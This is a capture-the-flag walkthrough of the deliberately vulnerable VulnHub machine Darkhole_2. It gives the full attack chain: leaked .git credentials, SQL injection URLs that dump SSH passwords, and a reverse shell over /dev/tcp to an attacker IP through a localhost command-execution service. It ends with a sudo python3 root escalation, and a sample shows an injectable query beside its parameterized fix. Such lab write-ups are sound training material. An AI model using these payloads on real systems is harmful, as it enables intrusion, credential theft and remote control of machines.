Darkhole_2 (VulnHub – Easy)

Darkhole_2 is a compact but satisfying machine that chains together Git repository leakage, SQL injection, SSH credential extraction, and a simple privilege escalation through a locally exposed web service. The foothold is obtained by dumping a .git directory and recovering hardcoded credentials. Privilege escalation is achieved by tunneling to a hidden localhost service and abusing its command execution functionality.

Overview

Target: 10.10.10.7
Initial vector: exposed .git → SQL injection → SSH
Privilege escalation: SSH port-forward → internal RCE → sudo python3

Enumeration

Host Discovery

$ sudo arp-scan -I eth0 --localnet
# or
$ sudo netdiscover -r 10.10.10.0/24

Port Scan

$ sudo nmap -p- --open -sS --min-rate=5000 -n -Pn -vvv 10.10.10.7 -oG Ports.txt

Service Scan

$ sudo nmap -p22,80 -sCV -Pn -n -vvv 10.10.10.7 -oN Services.txt

Port 80 exposes a website with an accessible .git directory.

Foothold – Dumping the Git Repository

Dump the repo:

$ git-dumper http://10.10.10.7/.git the_git_dir
$ cd the_git_dir
$ git log
$ git diff

A commit reveals hardcoded credentials:

lush@admin.com : 321

Logging in with these credentials succeeds, and the dashboard's id parameter turns out to be vulnerable to SQL injection.

SQL Injection → Credential Extraction

Enumerate tables:

http://10.10.10.7/dashboard.php?id=NULL' UNION SELECT 1,TABLE_NAME,2,3,4,5 FROM INFORMATION_SCHEMA.TABLES-- -

Enumerate columns:

http://10.10.10.7/dashboard.php?id=NULL' UNION SELECT 1,GROUP_CONCAT(COLUMN_NAME),2,3,4,5 FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='ssh'-- -

Dump SSH credentials:

http://10.10.10.7/dashboard.php?id=NULL' UNION SELECT 1,user,pass,4,5,6 FROM ssh-- -

Recovered credentials:

jehad : fool
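
To show the defect behind the injectable id parameter beside its fix, here is an added example (not code from the box or from this walkthrough): a Python/sqlite3 stand-in for dashboard.php with a constructed schema, where the same UNION payload shape dumps the ssh table from the string-built query and matches nothing once the value is bound as a parameter.

```python
import sqlite3

# Constructed stand-in for the target's database: a users table behind the
# login and an ssh table holding credentials (table and row values are made
# up for this example; the names follow the walkthrough).
def build_db():
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE users (id INTEGER, email TEXT, role TEXT);
        INSERT INTO users VALUES (1, 'lush@admin.com', 'admin');
        CREATE TABLE ssh (user TEXT, pass TEXT);
        INSERT INTO ssh VALUES ('jehad', 'fool');
    """)
    return db

def dashboard_vulnerable(db, user_id):
    # Mirrors the flaw behind dashboard.php?id=...: the parameter is pasted
    # straight into the SQL text, so a quote closes the literal and an
    # attacker-chosen UNION appends rows from any table to the result.
    sql = f"SELECT id, email, role FROM users WHERE id = '{user_id}'"
    return db.execute(sql).fetchall()

def dashboard_fixed(db, user_id):
    # Hardened form: the value is bound as a parameter and never becomes SQL,
    # so the whole string is compared literally against the id column.
    sql = "SELECT id, email, role FROM users WHERE id = ?"
    return db.execute(sql, (user_id,)).fetchall()

# The walkthrough's payload shape, adapted to this three-column query.
PAYLOAD = "NULL' UNION SELECT 1, user, pass FROM ssh-- -"

def demo():
    db = build_db()
    return {
        "normal_fixed": dashboard_fixed(db, "1"),
        "payload_vulnerable": dashboard_vulnerable(db, PAYLOAD),
        "payload_fixed": dashboard_fixed(db, PAYLOAD),
    }

if __name__ == "__main__":
    for name, rows in demo().items():
        print(f"{name}: {rows}")
```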

Gaining Access

$ ssh jehad@10.10.10.7

Inside .bash_history, a clue appears: a web server bound to 127.0.0.1:9999 that takes a ?cmd= parameter.

Privilege Escalation

Port-forward the internal service

$ ssh -L 9999:127.0.0.1:9999 jehad@10.10.10.7

Visit:

http://localhost:9999?cmd=id
-> losy

Reverse Shell

Listener:

$ nc -nlvp 443

Trigger:

http://localhost:9999?cmd=bash -c 'bash -i %26%3E /dev/tcp/10.10.10.9/443 0%3E%261'

A shell is obtained as losy.

Root via sudo python3

$ sudo -l
-> (root) NOPASSWD: /usr/bin/python3

Exploit:

$ sudo python3 -c 'import os; os.system("bash")'

Root shell obtained.

Conclusion

Darkhole_2 is a compact exploitation chain: Git leakage → SQL injection → SSH → internal service RCE → sudo python3. It’s a great example of how small misconfigurations compound into full system compromise.